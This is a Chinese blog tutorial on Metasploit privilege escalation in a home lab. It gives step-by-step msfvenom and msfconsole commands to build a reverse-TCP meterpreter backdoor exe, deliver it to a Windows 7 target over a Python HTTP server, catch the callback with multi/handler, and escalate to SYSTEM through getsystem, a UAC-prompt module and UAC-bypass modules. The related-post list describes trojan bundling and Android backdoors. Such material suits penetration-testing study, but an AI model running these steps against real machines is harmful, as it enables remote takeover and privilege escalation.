[内网渗透]msfconsole提权

最新推荐文章于 2024-04-22 17:09:59 发布
最新推荐文章于 2024-04-22 17:09:59 发布
阅读量1.2k 收藏 10
点赞数 2
分类专栏: 网络安全 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/purvispanwu/article/details/114807595
版权

1.环境准备
kali虚拟机
IP:192.168.112.66
在这里插入图片描述
靶机
win7 SP1
IP:192.168.112.145
在这里插入图片描述
2.生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.112.66 lport=4444 -f exe -o /tmp/purvis.exe
这里我们为生成的木马指定了payload为:

windows/meterpreter/reverse_tcp,反弹到的监听端地址为192.168.112.66,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe
在这里插入图片描述3.使用python创建一个http服务器
SimpleHTTPServer是Python 2自带的一个模块,是Python的Web服务器。在Python 3已经合并到http.server模块中。如果不指定端口号默认的是8000端口。在局域网中使用web去访问http:/IP:8000即可
python2语法:python -m SimpleHTTPServer
在这里插入图片描述

win7访问 http://192.168.112.66:8000/ 拿到该后门程序并双击访问
在这里插入图片描述3.开撸
在这里插入图片描述

3.1加载模块

msf5 > use exploit/multi/handler 

3.2 设置payload

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

3.3 设置监听ip

msf5 exploit(multi/handler) > set lhost 192.168.112.66

3.4 设置监听port

msf5 exploit(multi/handler) > set LPORT 4444

3.5 执行

msf5 exploit(multi/handler) > exploit

4.查看权限
getuid
非system权限
在这里插入图片描述
5.权限提升
提权方法:
提高程序运行级别
UAC绕过
利用提权漏洞进行提权

5.1提高程序的运行级别
msf模块
exploit/windows/local/ask
执行会触发UAC

尝试getsystem提权,失败。
在这里插入图片描述 进入exploit/windows/local/ask
info查看信息
在这里插入图片描述
show optiaons查看选项
set session 设置连接
set filename 设置弹窗的提示

在这里插入图片描述exploit 后 靶机uac会弹出点击是,获得一个新的session 2

在这里插入图片描述

在这里插入图片描述进入session 2 getuid查看权限还是普通权限 getsystem提权 获得system权限
在这里插入图片描述

在这里插入图片描述

5.2 UAC绕过提权
msf模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injiction
exploit/windows/local/bypassuac_vbs

在这里插入图片描述

Purvis_U
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msfconsole
12-12
kail、ubantu的msfconsole平台的用法,如search导入,use调用等等
利用msf实现反弹shell与提权(细节过程秒懂)
Naiisii的博客
01-13 5666
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 1203
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
MSF入侵安卓手机
2301_77162959的博客
07-11 1095
里边安装了许许多多的工具。其中MSF就自带有。MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件。这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试。
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透MSF Windows提权 靶机: Win server2003 + iis(已.
对Android应用植入后门 实现msf控制(附带所需工具和常见坑解决办法)
weixin_72849553的博客
12-21 1950
本人刚入msf坑不久,对于Android的渗透比较感兴趣,于是在网上寻找了很久资料,但是发现很多实现方法都会出现各种奇怪报错,于是我花了点时间,在外面的世界找解决方案,总算实现成功,故整理文章,供正在困惑和迷茫中挣扎的小伙伴们互相交流。下面进入正题:我们的思路是对一个安卓应用注入msf生成的payload后门,并实现内网范围或是外网范围内的持续控制,这样就会实现后门随正常应用启动,但不易被发现。文中会提供一些思路拓展,如果需要,我可以再展开来讲。
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 1397
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
Windows提权学习笔记
m0_62466350的博客
07-28 371
service_permissions模块会使用,两种方式获取system权限,如果以管理员权限运行,会尝试创建并运行一个新的服务,如果当前权限不允许创建服务,会判断哪些服务的文件或文件夹的权限有问题,并对其进行劫持,在劫持服务时会创建一个可执行程序,其文件名和安装路径都是随机的。如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定是系统权限,还要看管理员开始安装sqlserver的权限设置,一般情况是system权限或者pulic,均能执行命令。
msfconsole实战使用(结合靶场演示),2024网络安全进阶新篇章
HUAXIAL的博客
04-08 980
Metasploit框架: Metasploit是一个用于开发、测试和执行渗透测试的框架,旨在帮助安全专业人员评估和增强系统的安全性。多功能平台: MSFconsole是Metasploit的命令行界面,支持多种操作系统,包括Linux、Windows和macOS。模块化结构: Metasploit的设计是模块化的,它包含了大量的模块,涵盖了各种渗透测试任务,如漏洞利用、扫描、信息收集等。
kali下msf提权
失心少年
09-23 4676
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler s...
Windows溢出提权 [msf全自动提权练习]
weixin_65722679的博客
07-21 349
Windows溢出提权 [msf全自动提权练习]
渗透大全msfconsole.ppt
11-12
又称作正片,是一种底片或菲林。常见的规格有135和120两种。通常是彩色,但特殊目的也有黑白的正片。也可用来印相或放大相片。 现在通常说的幻灯片多指电子幻灯片(演示文稿)。
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
最新发布
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
浅谈MSF渗透测试
02-24
是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务...
msfconsole命令大全,以及使用说明
m0_48096446的博客
07-05 5352
渗透工具 msfconsole命令大全
msf之木马程序
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
09-15 1万+
捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 把它上传到了root/dy/路径下 然后开始捆绑 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe -p:指定后面的pa
后渗透通过msfconsole获取一个普通的session
bring_coco的博客
11-05 3957
最近在学后渗透,首先实验一下获取普通session 虚拟机实验环境:1.kali 2.win7 实验步骤: 1.在kali终端中打开msfconsole控制台 2.进入侦听模块 3.再次开启一个终端进行(shift+ctrl+T),查看本机ip 4.利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 -f exe 生成exe格式 说明:
木马渗透安卓系统实验
polaris___的博客
05-30 4351
1.实验内容 Metasploit后门攻击实现远程控制Android手机 2.实验环境 设备 IP 子网掩码 Kali Linux(Hack) 222.20.78.6 255.255.248.0 Android(靶机) 10.11.6...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值